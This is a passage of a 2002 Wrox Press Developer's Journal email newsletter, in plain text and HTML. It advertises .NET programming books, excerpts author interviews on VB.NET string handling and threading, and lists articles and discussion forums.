 WROX ANNOUNCEMENTS
 ==========
 Author Interviews
 ***With Franois Liger, Craig McQueen and Paul Wilton, authors of Visual
 Basic .NET Text Manipulation Handbook.
 [AP] What do you think this book brings to the Visual Basic .NET
 developer, and so who do you think needs this book?
 [CM] The book provides a quick easy reference for string programming
 tasks. String manipulation is a large part of programming and it is
 difficult to remember it all. Having an accessible reference assists in
 finding existing code to do the job rather than rewriting something that
 is already in the platform. It's valuable for all .NET developers.
 [PW] I think all VB.NET developers need this book. String handling and
 regular expressions are not arcane topics for high-flying gurus - they are
 the stuff of everyday programming! The regular expression chapters give a
 great insight into what at first can seem a tricky topic. In addition the
 regular expression reference at the back of the book is worth its weight
 in gold - certainly more readable than all the documentation I had to work
 with when writing the book.
 [AP] In two sentences, explain what strings are in .NET. 
 Read the interview in full:
 http://www.wrox.com/ACON7.asp?art_type=2&amp;id=808&amp;tid026
 Or read about Visual Basic .NET Text Manipulation Handbook:
 http://www.wrox.com/ACON11.asp?ISBN=1861007302&amp;tid026
 ***With Tobin Titus, author of Visual Basic .NET Threading Handbook
 In June, Wrox brought out a slim 260-page volume on threading in VB.NET.
 There has been some confusion as to why we would want to bring a book out
 on what seems a straightforward topic. In this article we interview Tobin
 Titus (one of the authors on this title) and ask him various questions on
 the book, as well getting his opinions on various programming-related
 topics.
 What is free threading? 
 Free threading is the ability to control execution to the utmost within an
 application. While VB developers have been able to control some aspects of
 threading in the past, they haven't been completely free to control those
 threads in the manner that they desire. Free threading allows the
 developer to make decisions on when a thread should start, when it should
 end, and what it should do while executing.
 Read the interview in full here:
 http://www.wrox.com/ACON7.asp?art_type=2&amp;id=805&amp;tid026
 Or read about Visual Basic .NET Threading Handbook:
 http://www.wrox.com/ACON11.asp?ISBN=1861007132&amp;tid026
 ***C#Today Free Code Download
 Due to customer feedback, C#Today have decided to try out something new
 this week - we are making this week's code  download \ support material
 available to all non-subscribers (providing they are a member of the Wrox
 Developer Community, which is free to join).
 This week's case study: Generating Design Patterns Using CodeDOM 
 http://www.csharptoday.com/content/articles/20020722.asp?&amp;tid026
 The Code Document Model (CodeDOM), which provides the ability to generate
 source code in a number of the managed languages, is a very powerful .NET
 facility and has attracted much interest. Within Visual Studio .NET, a
 complementary though unrelated feature is provided by the CodeModel
 object, which allows programmatic access to hand-written code. Together
 these two tools provide a platform from which it should be possible to
 develop a VS.NET add-in to streamline the production of common designs in
 code. This case study follows the development of such a tool, which
 attempts to automate the generation of a widespread design pattern in an
 existing C# or VB.NET project.
 ***Get on the Fast Track to Success
 If you are an experienced programmer who needs to get up to speed on core
 .NET Technologies as quickly as possible, the Fast Track series is for
 you.
 The Fast Track books complement our Beginning and Professional series by
 providing concise guides to core topics. They deliver the essential facts
 and understanding that are required to start taking advantage of .NET. By
 targeting specific groups of experienced developers, the books are able to
 concentrate on providing valuable information rather than covering basics.
 Read the full article here:
 http://www.wrox.com/ACON7.asp?art_type=2&amp;id=804&amp;tid026
 ==========
 INFORMATION FOR SUBSCRIBERS
 ==========
 You can unsubscribe from this list by visiting
 http://www.wrox.com/ACON3.asp?tid026
 Enter your e-mail address into the field at the bottom of the page and
 press the unsubscribe button. The page will refresh and you will see a
 short message above the field to tell you if you have successfully
 unsubscribed.
 Similarly, to change the address that the Developers Journal is mailed
 to, enter your previous address and click unsubscribe, then enter your
 new address and click subscribe.
 Replying to this mail, however, will NOT automatically take your address
 off our lists.
 We'd like to hear from you. Please send all comments regarding the
 Developer's Journal to Emma at DJ@wrox.com.
 Comments about Wrox books should be sent to feedback@wrox.com. 
 Technical support relating to Wrox books is available at support@wrox.com.
 Wrox - Programmer to Programmer(TM): http://www.wrox.com/?tid026
 ------Multipart-Boundary-xx5UNseljF43o---
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 &lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Language" content="en-gb"&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;title&gt;Wrox Press Developers Journal Programmer to Programmer TM&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;p align="left"&gt;&lt;font size="1" face="Verdana"&gt;
 If you would prefer to receive plain text, please let us know: 
 &lt;a href="mailto:editorialteam@wrox.com?subject=plain_text_mail"&gt;editorialteam@wrox.com?subject=plain_text_mail&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial Black" size="4"&gt;
 &lt;img border="0" src="http://www.wrox.com/Images/Website/newwroxlogo.gif" width="60" height="60" alt="Wrox Press"&gt;
 &lt;br&gt;
 Wrox &lt;/font&gt;&lt;font face="Arial" size="4"&gt;Press Developer's Journal
 &lt;br&gt;
 .NET Special&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;
 &lt;font face="Arial" size="2"&gt;&lt;i&gt;Programmer to Programmer&lt;/i&gt;&lt;/font&gt;
 &lt;font face="Arial" size="1"&gt;TM
 &lt;br&gt;
 &lt;a href="http://www.wrox.com/default.asp?tid027"&gt;www.wrox.com&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align="left"&gt;&lt;font face="Verdana" size="1"&gt;&lt;b&gt;7/26/02&lt;/font&gt;
 &lt;br&gt;
 &lt;font size="3" face="Arial"&gt;&lt;a name="beginning"&gt;IN THIS ISSUE&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align="left"&gt;
 &lt;a href="#title"&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;TITLE OF THE MONTH&lt;/font&gt;&lt;/a&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;&lt;br&gt;
 &lt;/font&gt;
 &lt;a href="#gems"&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;GEMS FROM THE CATALOGUE&lt;/font&gt;&lt;/a&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;&lt;br&gt;
 &lt;/font&gt;
 &lt;a href="#recently"&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;RECENTLY RELEASED&lt;/font&gt;&lt;/a&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;&lt;br&gt;
 &lt;/font&gt;
 &lt;a href="#future"&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;FUTURE TITLES&lt;/font&gt;&lt;/a&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;&lt;br&gt;
 &lt;/font&gt;
 &lt;a href="#news"&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;NEWS &amp; FEATURES&lt;/font&gt;&lt;/a&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;&lt;br&gt;
 &lt;/font&gt;
 &lt;a href="#announce"&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;WROX ANNOUNCEMENTS&lt;/font&gt;&lt;/a&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;&lt;br&gt;
 &lt;/font&gt;
 &lt;a href="#other"&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;OTHER ANNOUNCEMENTS&lt;/font&gt;&lt;/a&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;&lt;br&gt;
 &lt;/font&gt;
 &lt;a href="#info"&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;INFORMATION FOR SUBSCRIBERS&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;
 &lt;br&gt;
 &lt;a name="title"&gt;&lt;/a&gt;&lt;b&gt;&lt;font size="3" face="Arial"&gt;TITLE OF THE MONTH&lt;/font&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;font size="1" face="Verdana"&gt;ASP.NET Namespace Reference with C#&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;
 &lt;font size="1" face="Verdana"&gt;&lt;a href="http://www.wrox.com/ACON11.asp?ISBN=1861007442&amp;tid027"&gt;http://www.wrox.com/ACON11.asp?ISBN=1861007442&amp;tid027&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;a href="http://www.wrox.com/ACON11.asp?ISBN=1861007442&amp;tid027"&gt;&lt;img border="0" height="151" alt="ASP.NET Namespace Reference with C#" src="http://www.wrox.com/Images/Covers/7442.gif" width="120"&gt;&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;b&gt;Table of Contents&lt;/b&gt;
 &lt;br&gt;&lt;br&gt;
 Introduction&lt;br&gt;
 System.Web&lt;br&gt;
 System.Web.UI&lt;br&gt;
 System.Web.UI.HtmlControls&lt;br&gt;
 System.Web.UI.WebControls&lt;br&gt;
 System.Web.UI.MobileControls&lt;br&gt;
 System.Web.Caching&lt;br&gt;
 System.Web.Configuration&lt;br&gt;
 System.Web.Security&lt;br&gt;
 System.Web.Services&lt;br&gt;
 System.Web.Services.Description&lt;br&gt;
 System.Web.Services.Protocols&lt;br&gt;
 Data in ASP.NET&lt;br&gt;
 XML in ASP.NET&lt;br&gt; 
 &lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font size="1" face="Verdana"&gt;*Also available&lt;br&gt;
 &lt;b&gt;ASP.NET Namespace Reference with VB.NET&lt;/b&gt;&lt;br&gt;
 &lt;a href="http://www.wrox.com/ACON11.asp?ISBN=1861007450&amp;tid027"&gt;http://www.wrox.com/ACON11.asp?ISBN=1861007450&amp;tid027&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;a href="#beginning"&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;Top&lt;/font&gt;&lt;/a&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;
 &lt;/font&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;a name="gems"&gt;&lt;/a&gt;&lt;b&gt;&lt;font size="3" face="Arial"&gt;GEMS FROM THE CATALOGUE&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font size="1" face="Verdana"&gt;Professional Linux Programming&lt;br&gt;
 &lt;a href="http://www.wrox.com/ACON11.asp?ISBN=1861003013&amp;tid027"&gt;
 http://www.wrox.com/ACON11.asp?ISBN=1861003013&amp;tid027&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://www.wrox.com/ACON11.asp?ISBN=1861003013&amp;tid027"&gt;&lt;img border="0" height="151" alt="Professional Linux Programming" src="http://www.wrox.com/Images/Covers/3013.gif" width="120"&gt;&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;b&gt;Table of Contents&lt;/b&gt;
 &lt;br&gt;&lt;br&gt;
 Introduction&lt;br&gt;
 Chapter 1: Application Design&lt;br&gt;
 Chapter 2: Concurrent Versions System (CVS)&lt;br&gt;
 Chapter 3: Databases&lt;br&gt;
 Chapter 4: PostgreSQL interfacing&lt;br&gt;
 Chapter 5: MySQL&lt;br&gt;
 Chapter 6: Tackling Bugs&lt;br&gt;
 Chapter 7: LDAP Directory Services&lt;br&gt;
 Chapter 8: GUI programming with GNOME/GTK+&lt;br&gt;
 Chapter 9: GUI Building with Glade and GTK+/GNOME&lt;br&gt;
 Chapter 10: Flex and Bison&lt;br&gt;
 Chapter 11: Testing Tools&lt;br&gt;
 Chapter 12: Secure Programming&lt;br&gt;
 Chapter 13: GUI programming with KDE/Qt&lt;br&gt;
 Chapter 14: Writing the dvdstore GUI using KDE/Qt&lt;br&gt;
 Chapter 15: Python&lt;br&gt;
 Chapter 16: Creating Web interfaces with PHP&lt;br&gt;
 Chapter 17: Embedding and extending Python with C/C++&lt;br&gt;
 Chapter 18: Remote Procedure Calls&lt;br&gt;
 Chapter 19: Multi-media and Linux&lt;br&gt;
 Chapter 20: CORBA.&lt;br&gt;
 Chapter 21: Implementing CORBA with ORBit&lt;br&gt;
 Chapter 22: Diskless systems&lt;br&gt;
 Chapter 23: XML and libxml&lt;br&gt;
 Chapter 24: Beowulf Clusters&lt;br&gt;
 Chapter 25: Documentation&lt;br&gt;
 Chapter 26: Device Drivers&lt;br&gt;
 Chapter 27: Distributing the application&lt;br&gt;
 Chapter 28: Internationalization&lt;br&gt;
 &lt;/font&gt;&lt;/p&gt;
 &lt;a href="#beginning"&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;Top&lt;/font&gt;&lt;/a&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;
 &lt;/font&gt;
 &lt;p&gt;
 &lt;b&gt;&lt;a name="recently"&gt;&lt;font face="Arial" size="3"&gt;RECENTLY RELEASED&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;
 &lt;font size="1" face="Verdana"&gt;(click for more information)&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font size="1" face="Verdana"&gt;
 &lt;a href="http://www.wrox.com/ACON11.asp?ISBN=1861007442&amp;tid027"&gt;
 ASP.NET 1.0 Namespace Reference with C#&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;font size="1" face="Verdana"&gt;&lt;a href="http://www.wrox.com/ACON11.asp?ISBN=1861007450&amp;tid027"&gt;
 ASP.NET 1.0 Namespace Reference with VB.NET&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://www.wrox.com/ACON11.asp?ISBN=1861007418&amp;tid027"&gt;
 Beginning ASP.NET Databases using C#&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://www.wrox.com/ACON11.asp?ISBN=1861006098&amp;tid027"&gt;
 Beginning C# Databases&lt;/a&gt;
 &lt;br&gt;
 &lt;a href="http://p2p.wrox.com/list.asp?list=beginning_c_sharp_databases&amp;tid027"&gt;
 &lt;font color="#000080"&gt;(Join the p2p discussion list for this title here)&lt;/font&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://www.wrox.com/ACON11.asp?ISBN=1861007469&amp;tid027"&gt;
 Professional Open Source Web Services&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://www.wrox.com/ACON11.asp?ISBN=186100737x&amp;tid027"&gt;
 Developing C# Windows Software: A Windows Forms Tutorial&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://www.wrox.com/ACON11.asp?ISBN=1861007248&amp;tid027"&gt;
 Professional ASP.NET 1.0 XML using C#&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://www.wrox.com/ACON11.asp?ISBN=1861007396&amp;tid027"&gt;
 Visual Basic .NET Solutions Toolkit&lt;/a&gt;&lt;/font&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a name="future"&gt;&lt;/a&gt;&lt;p&gt;&lt;b&gt;&lt;font size="3" face="Arial"&gt;FUTURE TITLES&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;
 &lt;font size="1" face="Verdana"&gt;(click for more information)&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font size="1" face="Verdana"&gt;
 &lt;a href="http://www.wrox.com/ACON11.asp?ISBN=1861007612&amp;tid027"&gt;
 Beginning VB.NET, 2nd Edition&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;font size="1" face="Verdana"&gt;&lt;a href="http://www.wrox.com/ACON11.asp?ISBN=1861007256&amp;tid027"&gt;
 Beginning .NET Web Services with VB.NET&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://www.wrox.com/ACON11.asp?ISBN=1861006985&amp;tid027"&gt;
 Professional VB.NET Design Patterns&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://www.wrox.com/ACON11.asp?ISBN=1861007604&amp;tid027"&gt;
 Fast Track ADO.NET&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://www.wrox.com/ACON11.asp?ISBN=1861006209&amp;tid027"&gt;
 ASP.NET Security&lt;/a&gt;
 &lt;br&gt;
 &lt;a href="http://p2p.wrox.com/list.asp?list=aspx_security&amp;tid027"&gt;
 &lt;font color="#000080"&gt;(Join the p2p discussion list for this title here)&lt;/font&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://www.wrox.com/ACON11.asp?ISBN=1861007663&amp;tid027"&gt;
 Fast Track Windows Forms&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://www.wrox.com/ACON11.asp?ISBN=1861007752&amp;tid027"&gt;
 Professional ASP.NET Web Services with VB.NET&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://www.wrox.com/ACON11.asp?ISBN=1861007477&amp;tid027"&gt;
 VB.NET Code Level Security Handbook&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://www.wrox.com/ACON11.asp?ISBN=186100740x&amp;tid027"&gt;
 VB.NET Remoting Handbook&lt;/a&gt;&lt;/font&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://www.wrox.com/ACON11.asp?ISBN=186100771x&amp;tid027"&gt;
 VB.NET Delpoyment Handbook&lt;/a&gt;&lt;/font&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;a href="#beginning"&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;Top&lt;/font&gt;&lt;/a&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;
 &lt;/font
 &lt;p&gt;
 &lt;a name="news"&gt;&lt;/a&gt;&lt;p&gt;&lt;font size="3" face="Arial"&gt;&lt;b&gt;NEWS &amp; FEATURES&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;
 &lt;a href="http://www.asptoday.com/default.asp?&amp;tid027"&gt;&lt;img alt="ASPToday" border="0" src="http://www.p2p.wrox.com/ASPToday/ASPTodayLogo.gif" width="170" height="29"&gt;&lt;/a&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;b&gt;ASPToday announces their Inaugural&lt;font color="#CC0000"&gt; Guru Week&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;
 &lt;br&gt;&lt;br&gt;&lt;font face="Verdana" SIZE="1"&gt;
 - &lt;b&gt;Dan Wahlin&lt;/b&gt; expounds on XML Support in ASP.NET&lt;br&gt;&lt;br&gt;
 ASPToday are proud to announce their first Guru Week. From 29th July to 2nd August Microsoft MVP, ASPToday author and www.xmlforasp.net/ founder 
 Dan Wahlin presents a series of specially commissioned articles, telling you all you need to know about XML support in ASP.NET. Drawing on his 
 experience of consulting and XML training, Dan's articles will allow anyone interested in XML to quickly get up to speed in this important subject.
 &lt;br&gt;
 &lt;br&gt;
 Read more about ASPToday's Guru Weeks: &lt;a href="http://www.wrox.com/ACON7.asp?art_type=1&amp;id=809&amp;tid027"&gt;http://www.wrox.com/ACON7.asp?art_type=1&amp;id=809&amp;tid027&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 Subscription to ASPToday starts at $10 per month: &lt;a href="http://www.asptoday.com/actions/linkhandlers/processsubscribelink.asp?&amp;tid027"&gt;&lt;b&gt;subscribe Now&lt;/b&gt;&lt;/a&gt;.
 Alternatively, you can purchase any article in our library for &lt;font color="#CC0000"&gt;&lt;b&gt;$5&lt;/b&gt;&lt;/font&gt;.&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;b&gt;Updating Data Safely with a DataSet,&lt;/b&gt; an article by &lt;font color="#CC0000"&gt;&lt;b&gt; Alex Homer&lt;/b&gt;&lt;/font&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;a href="http://www.wrox.com/ACON11.asp?ISBN=1861004923&amp;tid027"&gt;&lt;img border="0" height="151" alt="ASP.NET Distributed Data Applications" src="http://www.wrox.com/Images/Covers/4923.gif" width="120"&gt;&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 "OK, so we cant store all three values for a row (the current, original and the underlying values) in the 
 tables of our DataSet. Is this actually important? What do we actually need to perform the process, and 
 what do users actually expect to see? Can we make do with just two values instead of three, (and dont 
 you hate books that keep asking questions)?"&lt;br&gt;&lt;br&gt;
 Read the whole of Alex Homer's article here:&lt;br&gt;
 &lt;a href="http://www.wrox.com/ACON7.asp?art_type=1&amp;id=810&amp;tid027"&gt;http://www.wrox.com/ACON7.asp?art_type=1&amp;id=810&amp;tid027&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;a href="#beginning"&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;Top&lt;/font&gt;&lt;/a&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;
 &lt;/font&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;a name="announce"&gt;&lt;/a&gt;&lt;p&gt;&lt;font size="3" face="Arial"&gt;&lt;b&gt;WROX ANNOUNCEMENTS&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;font size="1" face="Verdana"&gt;
 &lt;b&gt;AUTHOR INTERVIEWS&lt;/b&gt;
 &lt;br&gt;
 &lt;br&gt;
 - With &lt;font color="#CC0000"&gt;&lt;b&gt;Franois Liger, Craig McQueen&lt;/b&gt;&lt;/font&gt; and &lt;font color="#CC0000"&gt;&lt;b&gt;Paul Wilston,&lt;/b&gt;&lt;/font&gt; 
 authors of &lt;a href="http://www.wrox.com/ACON11.asp?ISBN=1861007302&amp;tid027"&gt;Visual Basic .NET Text Manipulation Handbook&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;b&gt;Q. What do you think this book brings to the Visual Basic .NET developer, and so who do you think needs this book?&lt;/b&gt;&lt;br&gt;&lt;br&gt; 
 &lt;font color="#CC0000"&gt;[CM]&lt;/font&gt; The book provides a quick easy reference for string programming tasks. String manipulation is a 
 large part of programming and it is difficult to remember it all. Having an accessible reference assists in finding existing code 
 to do the job rather than rewriting something that is already in the platform. It's valuable for all .NET developers.&lt;br&gt; 
 &lt;font color="#CC0000"&gt;[PW]&lt;/font&gt; I think all VB.NET developers need this book. String handling and regular expressions are 
 not arcane topics for high-flying gurus - they are the stuff of everyday programming! The regular expression chapters give a 
 great insight into what at first can seem a tricky topic. In addition the regular expression reference at the back of the book 
 is worth its weight in gold - certainly more readable than all the documentation I had to work with when writing the book.&lt;br&gt; 
 &lt;font color="#CC0000"&gt;[AP]&lt;/font&gt; In two sentences, explain what strings are in .NET&lt;br&gt;&lt;br&gt; 
 Read the interview in full:&lt;br&gt;
 &lt;a href="http://www.wrox.com/ACON7.asp?art_type=2&amp;id=808&amp;tid027"&gt;http://www.wrox.com/ACON7.asp?art_type=2&amp;id=808&amp;tid027&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 Or read about Visual Basic .NET Threading Handbook:&lt;br&gt;
 &lt;a href="http://www.wrox.com/ACON11.asp?ISBN=1861007302&amp;tid027"&gt;http://www.wrox.com/ACON11.asp?ISBN=1861007302&amp;tid027&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 - with &lt;font color="#CC0000"&gt;&lt;b&gt;Tobin Titus,&lt;/b&gt;&lt;/font&gt; author of &lt;a href="http://www.wrox.com/ACON11.asp?ISBN=1861007132&amp;tid027"&gt; Visual Basic .NET Threading Handbook&lt;/a&gt;
 &lt;br&gt;&lt;br&gt;
 In June, Wrox brought out a slim 260-page volume on threading in VB.NET. There has been some confusion as to why we would want to bring a book out on what 
 seems a straightforward topic. In this article we interview Tobin Titus (one of the authors on this title) and ask him various questions on the book, as 
 well getting his opinions on various programming-related topics.&lt;br&gt;&lt;br&gt; 
 &lt;b&gt;Q. What is free threading?&lt;/b&gt;&lt;br&gt;&lt;br&gt; 
 Free threading is the ability to control execution to the utmost within an application. While VB developers have been able to control some aspects of 
 threading in the past, they haven't been completely free to control those threads in the manner that they desire. Free threading allows the developer 
 to make decisions on when a thread should start, when it should end, and what it should do while executing.&lt;br&gt;&lt;br&gt; 
 Read the interview in full here:&lt;br&gt;
 &lt;a href="http://www.wrox.com/ACON7.asp?art_type=2&amp;id=805&amp;tid027"&gt;http://www.wrox.com/ACON7.asp?art_type=2&amp;id=805&amp;tid027&lt;/a&gt;&lt;br&gt;&lt;br&gt;
 Or read about Visual Basic .NET Threading Handbook:&lt;br&gt;
 &lt;a href="http://www.wrox.com/ACON11.asp?ISBN=1861007132&amp;tid027"&gt;http://www.wrox.com/ACON11.asp?ISBN=1861007132&amp;tid027&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;b&gt;Get on the Fast Track to Success&lt;/b&gt;&lt;br&gt;&lt;br&gt;
 If you are an experienced programmer who needs to get up to speed on core .NET Technologies as quickly as possible, the Fast Track series is for you. 
 The Fast Track books complement our Beginning and Professional series by providing concise guides to core topics. They deliver the essential facts and 
 understanding that are required to start taking advantage of .NET. By targeting specific groups of experienced developers, the books are able to 
 concentrate on providing valuable information rather than covering basics.&lt;br&gt;&lt;br&gt; 
 Read the full article here:&lt;br&gt;
 &lt;a href="http://www.wrox.com/ACON7.asp?art_type=2&amp;id=804&amp;tid027"&gt;http://www.wrox.com/ACON7.asp?art_type=2&amp;id=804&amp;tid027&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;a href="http://www.csharptoday.com/default.asp?&amp;tid027"&gt;&lt;img alt="C#Today" border="0" src="http://www.p2p.wrox.com/ASPToday/CSharpTodayLogo.gif" width="170" height="30"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;
 &lt;b&gt;C#Today Free Code Download&lt;/b&gt;
 &lt;br&gt;
 &lt;br&gt;
 Due to customer feedback, C#Today have decided to try out something new this week - we are making this week's code  download \ support material available to all non-subscribers 
 (providing they are a member of the Wrox Developer Community, which is free to join).&lt;br&gt;&lt;br&gt;
 &lt;b&gt;This week's case study: Generating Design Patterns Using CodeDOM&lt;/b&gt; 
 &lt;a href="http://www.csharptoday.com/content/articles/20020722.asp?&amp;tid027"&gt;http://www.csharptoday.com/content/articles/20020722.asp?&amp;tid027&lt;/a&gt;
 The Code Document Model (CodeDOM), which provides the ability to generate source code in a number of the managed languages, is a very powerful .NET facility and has 
 attracted much interest. Within Visual Studio .NET, a complementary though unrelated feature is provided by the CodeModel object, which allows programmatic access to 
 hand-written code. Together these two tools provide a platform from which it should be possible to develop a VS.NET add-in to streamline the production of common designs 
 in code. This case study follows the development of such a tool, which attempts to automate the generation of a widespread design pattern in an existing C# or VB.NET project.&lt;br&gt;&lt;br&gt; 
 &lt;p&gt;&lt;a href="http://p2p.wrox.com/default.asp?&amp;tid027"&gt;&lt;img alt="P2P - Programmer's resource centre" border="0" src="http://p2p.wrox.com/top.gif" width="192" height="34"&gt;&lt;/a&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font size="1" face="Verdana"&gt;There are four new lists in the .NET category
 on p2p:
 &lt;br&gt;
 &lt;br&gt;
 &lt;b&gt;&lt;a href="http://p2p.wrox.com/list.asp?list=beginning_c_sharp_databases&amp;tid027"&gt;&lt;font color="#000080"&gt;beginning_c_sharp_databases&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;
 &lt;br&gt;
 Connecting your C# code to data sources
 &lt;br&gt;
 &lt;br&gt;
 &lt;b&gt;&lt;a href="http://p2p.wrox.com/list.asp?list=aspx_web_matrix&amp;tid027"&gt;&lt;font color="#000080"&gt;aspx_web_matrix&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;
 &lt;br&gt;
 Discuss Web Matrix, a free application development tool for ASP.NET
 &lt;br&gt;
 &lt;br&gt;
 &lt;b&gt;&lt;a href="http://p2p.wrox.com/list.asp?list=weo_object_builder&amp;tid027"&gt;&lt;font color="#000080"&gt;weo_object_builder&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;
 &lt;br&gt;
 Generate code in C# or VB.NET for SQL Server
 &lt;br&gt;
 &lt;br&gt;
 &lt;b&gt;&lt;a href="http://p2p.wrox.com/list.asp?list=regular_expressions&amp;&amp;tid027"&gt;&lt;font color="#000080"&gt;regular_expressions&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;
 &lt;br&gt;
 Principles and use of Regular Expressions&lt;/font&gt;&lt;/p&gt;
 &lt;a href="#beginning"&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;Top&lt;/font&gt;&lt;/a&gt;&lt;font face="Verdana" size="1" color="#000000"&gt;
 &lt;/font&gt;
 &lt;p&gt;&lt;br&gt;
 &lt;a name="info"&gt;&lt;/a&gt;&lt;p&gt;&lt;br&gt;
 &lt;/font&gt;&lt;b&gt;&lt;font size="3" face="Arial"&gt;INFORMATION FOR SUBSCRIBERS&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font size="1" face="Verdana"&gt;You can unsubscribe from this list by visiting &lt;a href="http://www.wrox.com/ACON3.asp?&amp;tid027"&gt;http://www.wrox.com/ACON3.asp&amp;tid027&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 Enter your e-mail address into the field at the
 bottom of the page and press the unsubscribe button. The page will refresh
 and you will see a short message above the field to tell you if you have
 successfully unsubscribed.
 &lt;br&gt;
 &lt;br&gt;
 Similarly, to change the address that the
 Developers Journal is mailed to, enter your previous address and click unsubscribe,
 then enter your new address and click subscribe.
 &lt;br&gt;
 &lt;br&gt;
 Replying to this mail, however, will &lt;b&gt;NOT&lt;/b&gt;
 automatically take your address off our lists.
 &lt;br&gt;
 &lt;br&gt;
 We'd like to hear from you. Please send all
 comments regarding the Developer's Journal to Vera at &lt;a href="mailto:DJ@wrox.com"&gt;mailto:DJ@wrox.com&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
 Comments about Wrox books should
 be sent to &lt;a href="mailto:feedback@wrox.com"&gt;mailto:feedback@wrox.com&lt;/a&gt;
 &lt;br&gt;
 &lt;br&gt;
